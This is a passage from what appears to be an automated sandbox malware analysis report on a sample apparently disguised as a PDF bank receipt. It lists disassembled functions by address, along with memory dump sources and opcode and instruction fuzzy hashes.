                                                                                                                                                          • Opcode Fuzzy Hash: af73661a3c1d1ec2391809ed0bb882f7a8741ec7dae6a13e05c4786a1c65dcc7
                                                                                                                                                          • Instruction Fuzzy Hash: BED19D74E00218CFDB54DFA5D984BAEBBB2FF89300F1085A9D419AB364DB359A85CF50
                                                                                                                                                          Function 067DF8B0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 80d131493fbf8a8fbbac33d4a0db198685cf0b05781a70521a8278775586f14a
                                                                                                                                                          • Instruction ID: af821ad698ea098aa56e742bdcdfe2a4e38c71d565e1efcd8c2fc80730f0fc6c
                                                                                                                                                          • Opcode Fuzzy Hash: 80d131493fbf8a8fbbac33d4a0db198685cf0b05781a70521a8278775586f14a
                                                                                                                                                          • Instruction Fuzzy Hash: 0AD19074E00218CFDB54DFA5D994BAEBBB2FF89300F1085A9D409AB354DB359A85CF50
                                                                                                                                                          Function 067DE590 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7ac2269232681633ff976ba17719d6dfeffdfe278e2f246e7520398249a1c675
                                                                                                                                                          • Instruction ID: 376c7b3d0189dd162b8341d66fcb9fe125a2dc93bacc54f41a21659c7045c2c3
                                                                                                                                                          • Opcode Fuzzy Hash: 7ac2269232681633ff976ba17719d6dfeffdfe278e2f246e7520398249a1c675
                                                                                                                                                          • Instruction Fuzzy Hash: DED1AE74E01218CFDB54DFA5D984BAEBBB2FF89300F1085A9D408AB364DB359A85CF50
                                                                                                                                                          Function 00EBFA8B Relevance: .3, Instructions: 290COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 03390952fa73e2d420dbca461da04a29dccc28781b1a29012e594d97d1f2d7ac
                                                                                                                                                          • Instruction ID: 2608a1ece56ed10f98a5c4c3a7516552fb51a83f7ff4b9875c4a01a6a4fbbda4
                                                                                                                                                          • Opcode Fuzzy Hash: 03390952fa73e2d420dbca461da04a29dccc28781b1a29012e594d97d1f2d7ac
                                                                                                                                                          • Instruction Fuzzy Hash: 9BD1D174E01218CFDB54DFA5C994BAEBBB2FF89300F1090A9D409AB365DB359A85CF50
                                                                                                                                                          Function 00EBF630 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ad7c8ab90ece4de9e73e8d1f88e3b14b7ffbd9ce81ef0d982da1c07184a0c0e4
                                                                                                                                                          • Instruction ID: 4ff96a2ff46224bb2abb563be7f4febe56c5ceb402bfefed9b2b8bcf71ad738d
                                                                                                                                                          • Opcode Fuzzy Hash: ad7c8ab90ece4de9e73e8d1f88e3b14b7ffbd9ce81ef0d982da1c07184a0c0e4
                                                                                                                                                          • Instruction Fuzzy Hash: E7D1BF74E01218CFDB54DFA5D984BAEBBB2FF89300F1090A9D409AB365DB359A85CF50
                                                                                                                                                          Function 067D9A48 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0e089bb9ab76aea53e255319ece3df41f9805ca9aa3527a2145a8f10668c6699
                                                                                                                                                          • Instruction ID: c0201a798484a53d80f00c83f068917a6517cdcad312457cac2565461d7810bd
                                                                                                                                                          • Opcode Fuzzy Hash: 0e089bb9ab76aea53e255319ece3df41f9805ca9aa3527a2145a8f10668c6699
                                                                                                                                                          • Instruction Fuzzy Hash: 20D1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D509AB368DB319985CF51
                                                                                                                                                          Function 067DBA38 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cacd66064cca4dc7ea05e8e349e093845e43847e38886733bfa0aaad528f35cf
                                                                                                                                                          • Instruction ID: 773c9d217d3aa140d0329ff03ad8d43a4a72083b73349aefb7509e0e4aced9c3
                                                                                                                                                          • Opcode Fuzzy Hash: cacd66064cca4dc7ea05e8e349e093845e43847e38886733bfa0aaad528f35cf
                                                                                                                                                          • Instruction Fuzzy Hash: 82D1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D3620 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c3bf332591ce5afdec7f3d818fe2f42d04b8a2da03e60e8d5eec93f7fc90292f
                                                                                                                                                          • Instruction ID: 5af126b56926c8d634d990f677d472d62fb84eb3255e7831efee60317c977521
                                                                                                                                                          • Opcode Fuzzy Hash: c3bf332591ce5afdec7f3d818fe2f42d04b8a2da03e60e8d5eec93f7fc90292f
                                                                                                                                                          • Instruction Fuzzy Hash: 31D1BE74E01218CFDB54DFA9D984B9DBBB2FF89300F2084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067D0E20 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 624ef9ac4635d217eb5e656a4a1e585946bd844bb47207162508e1435aa0b497
                                                                                                                                                          • Instruction ID: 441308ec226f0603cd2dceec9a3e23545921f4ebb16522d85ad853e4ce2276b0
                                                                                                                                                          • Opcode Fuzzy Hash: 624ef9ac4635d217eb5e656a4a1e585946bd844bb47207162508e1435aa0b497
                                                                                                                                                          • Instruction Fuzzy Hash: A1D1BF74E01218CFDB54DFA9D984B9DBBB2FF89300F1080A9D809AB368DB359985CF51
                                                                                                                                                          Function 067D5610 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e1572cd56d3cbed3db36835d5d9e4b488183fe7b151100d24f691c0f442a9b0e
                                                                                                                                                          • Instruction ID: 64f3a3433a679f31e86af373a7149e7536a51ff664d390b21a86f72b8f956f3a
                                                                                                                                                          • Opcode Fuzzy Hash: e1572cd56d3cbed3db36835d5d9e4b488183fe7b151100d24f691c0f442a9b0e
                                                                                                                                                          • Instruction Fuzzy Hash: 29D1BF74E01218CFDB54DFA9C984B9DBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067D7600 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 32d721ab7348979290674cee078788f53cd107c12153348ac847ad130102a318
                                                                                                                                                          • Instruction ID: bd81e0e44c391fd23795bbb88686a5a1c0da7100607dd2494759223527e62eca
                                                                                                                                                          • Opcode Fuzzy Hash: 32d721ab7348979290674cee078788f53cd107c12153348ac847ad130102a318
                                                                                                                                                          • Instruction Fuzzy Hash: DBD1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359A85CF51
                                                                                                                                                          Function 067D9ED8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 91d8ff659d186fb642ab6c088d388f1f6c3820dfbde399944975898a51b0b02f
                                                                                                                                                          • Instruction ID: 8c9f34c8b3a55480ab9fd3278d4ae4f28f48519c2c2e571950790d2fe2dd5538
                                                                                                                                                          • Opcode Fuzzy Hash: 91d8ff659d186fb642ab6c088d388f1f6c3820dfbde399944975898a51b0b02f
                                                                                                                                                          • Instruction Fuzzy Hash: F5D1AD74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359A85CF51
                                                                                                                                                          Function 067DBEC8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 238a0e109cb20815b1953190c80b117a0d16a1e7923e6253240c9343ac8bc7cb
                                                                                                                                                          • Instruction ID: 0b967f4c147831f1a94e28e1a12ecbeef137d497bf62ae5fef2284c053c44159
                                                                                                                                                          • Opcode Fuzzy Hash: 238a0e109cb20815b1953190c80b117a0d16a1e7923e6253240c9343ac8bc7cb
                                                                                                                                                          • Instruction Fuzzy Hash: 48D1BE74E00218CFDB55DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D3AB0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 665b3e73df0ecbfa87891df8701201e749cb4e995e16dfbbdacc32342e05d76d
                                                                                                                                                          • Instruction ID: 0e69ea79def1e78d02fa7f7df1178411331e6c668fab9a6a089c039cb5280579
                                                                                                                                                          • Opcode Fuzzy Hash: 665b3e73df0ecbfa87891df8701201e749cb4e995e16dfbbdacc32342e05d76d
                                                                                                                                                          • Instruction Fuzzy Hash: 29D19D74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359A85CF51
                                                                                                                                                          Function 067D5AA0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4257af544df7df277da16ab360a7c964ca8e8998ac06b79f6d521c9e69bcd774
                                                                                                                                                          • Instruction ID: 3a018ec2c6c7c98e04db7d3118bcf904aba6c831e4a00b33bb93ffb0c1c50e2f
                                                                                                                                                          • Opcode Fuzzy Hash: 4257af544df7df277da16ab360a7c964ca8e8998ac06b79f6d521c9e69bcd774
                                                                                                                                                          • Instruction Fuzzy Hash: 32D1BF74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067D7A90 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 26b1e461f82af771b2a25f56d27f83b48fde6b844f54609147201ff9b4afd1a9
                                                                                                                                                          • Instruction ID: 405399061bb01f8f875b2018de9d913d31d27d1b5c492f457f77047bcfd43665
                                                                                                                                                          • Opcode Fuzzy Hash: 26b1e461f82af771b2a25f56d27f83b48fde6b844f54609147201ff9b4afd1a9
                                                                                                                                                          • Instruction Fuzzy Hash: CED1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F2084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067DA368 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2625bd27066921591cb68f1f30c30998fbc2933e47af47c51cbcd09f0be7dc52
                                                                                                                                                          • Instruction ID: 4bfbfe66b1fe4567de8be5150e42b79ea019b320ed53f5f1bcbd1df486046a65
                                                                                                                                                          • Opcode Fuzzy Hash: 2625bd27066921591cb68f1f30c30998fbc2933e47af47c51cbcd09f0be7dc52
                                                                                                                                                          • Instruction Fuzzy Hash: 46D1BE74E01218CFDB54DFA9C984BADBBB2FF89300F1084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067DC358 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 04154d7a44708939df61e3fc0ae6ae33856218488cb8f4a2ed94911ddb8166e2
                                                                                                                                                          • Instruction ID: e6db557bc6245c543c961265cd88d524f51c0cb3fe221d398e3cf4e789d8906b
                                                                                                                                                          • Opcode Fuzzy Hash: 04154d7a44708939df61e3fc0ae6ae33856218488cb8f4a2ed94911ddb8166e2
                                                                                                                                                          • Instruction Fuzzy Hash: A4D1BE74E01218CFDB55DFA9C984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D3F40 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bf95b32cf62f88000143f7a6a3a88b5156ca3cebf21e0941b3170118a19d2394
                                                                                                                                                          • Instruction ID: ac4f2694b17b4ea09d6e8abc2c616921c56bbfd4e93bc021dbfa4f85177034cc
                                                                                                                                                          • Opcode Fuzzy Hash: bf95b32cf62f88000143f7a6a3a88b5156ca3cebf21e0941b3170118a19d2394
                                                                                                                                                          • Instruction Fuzzy Hash: DCD1AD74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D5F30 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 128b5ab6dd81364711cec17a347ef70e29d8f3812cf48198886fa437c94092ad
                                                                                                                                                          • Instruction ID: 7cb0288b980dd3485b9c38c5f5415bb7aef6f55529c6286fab9408efd17952e3
                                                                                                                                                          • Opcode Fuzzy Hash: 128b5ab6dd81364711cec17a347ef70e29d8f3812cf48198886fa437c94092ad
                                                                                                                                                          • Instruction Fuzzy Hash: 93D1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359A85CF51
                                                                                                                                                          Function 067D7F20 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3104137a91d488458f9e73d2585d61d7d8c62d144015aaf28ee358e296615325
                                                                                                                                                          • Instruction ID: a8bf5029f626238760ccef4416483e05f2b4dee5db437e8a7a0025d96c4bde12
                                                                                                                                                          • Opcode Fuzzy Hash: 3104137a91d488458f9e73d2585d61d7d8c62d144015aaf28ee358e296615325
                                                                                                                                                          • Instruction Fuzzy Hash: 2CD1BF74E01218CFDB54DFA9C984B9DBBB2FF89300F1084A9D419AB368DB319985CF51
                                                                                                                                                          Function 067DA7F8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ecaa1e4cd15f1c10f2a64ffcca16716f33a6f5d6d380dd763a28ac34ed2dad8f
                                                                                                                                                          • Instruction ID: 6d2c24d0e298f33d0916724e95496677bcc6315b5ceae620e36969d8ef3a44cc
                                                                                                                                                          • Opcode Fuzzy Hash: ecaa1e4cd15f1c10f2a64ffcca16716f33a6f5d6d380dd763a28ac34ed2dad8f
                                                                                                                                                          • Instruction Fuzzy Hash: 52D1BE74E01218CFDB54DFA9C984B9DBBB2FF89300F1085A9D409AB368DB359985CF51
                                                                                                                                                          Function 067DC7E8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 55224b9d1c9c39f4f6e67f5c45ae3e4d594c9b096bf1525a0cdf18e4902bb1d2
                                                                                                                                                          • Instruction ID: 7763f72cc9d317378dc1fca7a93ffe5e9e6170ecd4bcd681aaf7f648ee3ecce6
                                                                                                                                                          • Opcode Fuzzy Hash: 55224b9d1c9c39f4f6e67f5c45ae3e4d594c9b096bf1525a0cdf18e4902bb1d2
                                                                                                                                                          • Instruction Fuzzy Hash: A4D1BE74E00218CFDB55DFA9D984B9DBBB2FF89300F1085A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D43D0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8a4068268247b01f2317c03547adbca3226dfca166af6bff96097462c43f376c
                                                                                                                                                          • Instruction ID: 002a41451a2ef8ebecb66b79dd04e35ed6933d03a7f1c17871a7533b99c110d9
                                                                                                                                                          • Opcode Fuzzy Hash: 8a4068268247b01f2317c03547adbca3226dfca166af6bff96097462c43f376c
                                                                                                                                                          • Instruction Fuzzy Hash: 16D1AC74E01218CFDB54DFA9C984B9DBBB2FF89300F1084A9D419AB368DB319A85CF51
                                                                                                                                                          Function 067D63C0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 128b5ab6dd81364711cec17a347ef70e29d8f3812cf48198886fa437c94092ad
                                                                                                                                                          • Instruction ID: 9c4cd94c9b5e99427894b0b22e81c87453865c13a4815659e2b622b07ccdf201
                                                                                                                                                          • Opcode Fuzzy Hash: 128b5ab6dd81364711cec17a347ef70e29d8f3812cf48198886fa437c94092ad
                                                                                                                                                          • Instruction Fuzzy Hash: 77D1B074E01218CFDB54DFA9C994B9DBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067D83B0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2dbab09e7bff3389694338769595bd5ea2b422e0a816c210b8665b2cd2ee6a54
                                                                                                                                                          • Instruction ID: 1ef22913a0272e613239b784e9592d1137fbeaa91a32caf6130894d626d5e242
                                                                                                                                                          • Opcode Fuzzy Hash: 2dbab09e7bff3389694338769595bd5ea2b422e0a816c210b8665b2cd2ee6a54
                                                                                                                                                          • Instruction Fuzzy Hash: DBD1AE74E01218CFDB54DFA9C984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067DCC78 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 969f3f48c073017f4730ed9c3b0aa1fe4f42cb73daa29d6712baedd19303325a
                                                                                                                                                          • Instruction ID: f28d2a834ab5a69558a599d6574fdd412570f1d40d4864c3f5a03f4c1762c627
                                                                                                                                                          • Opcode Fuzzy Hash: 969f3f48c073017f4730ed9c3b0aa1fe4f42cb73daa29d6712baedd19303325a
                                                                                                                                                          • Instruction Fuzzy Hash: 72D1BF74E01218CFDB55DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067D6850 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
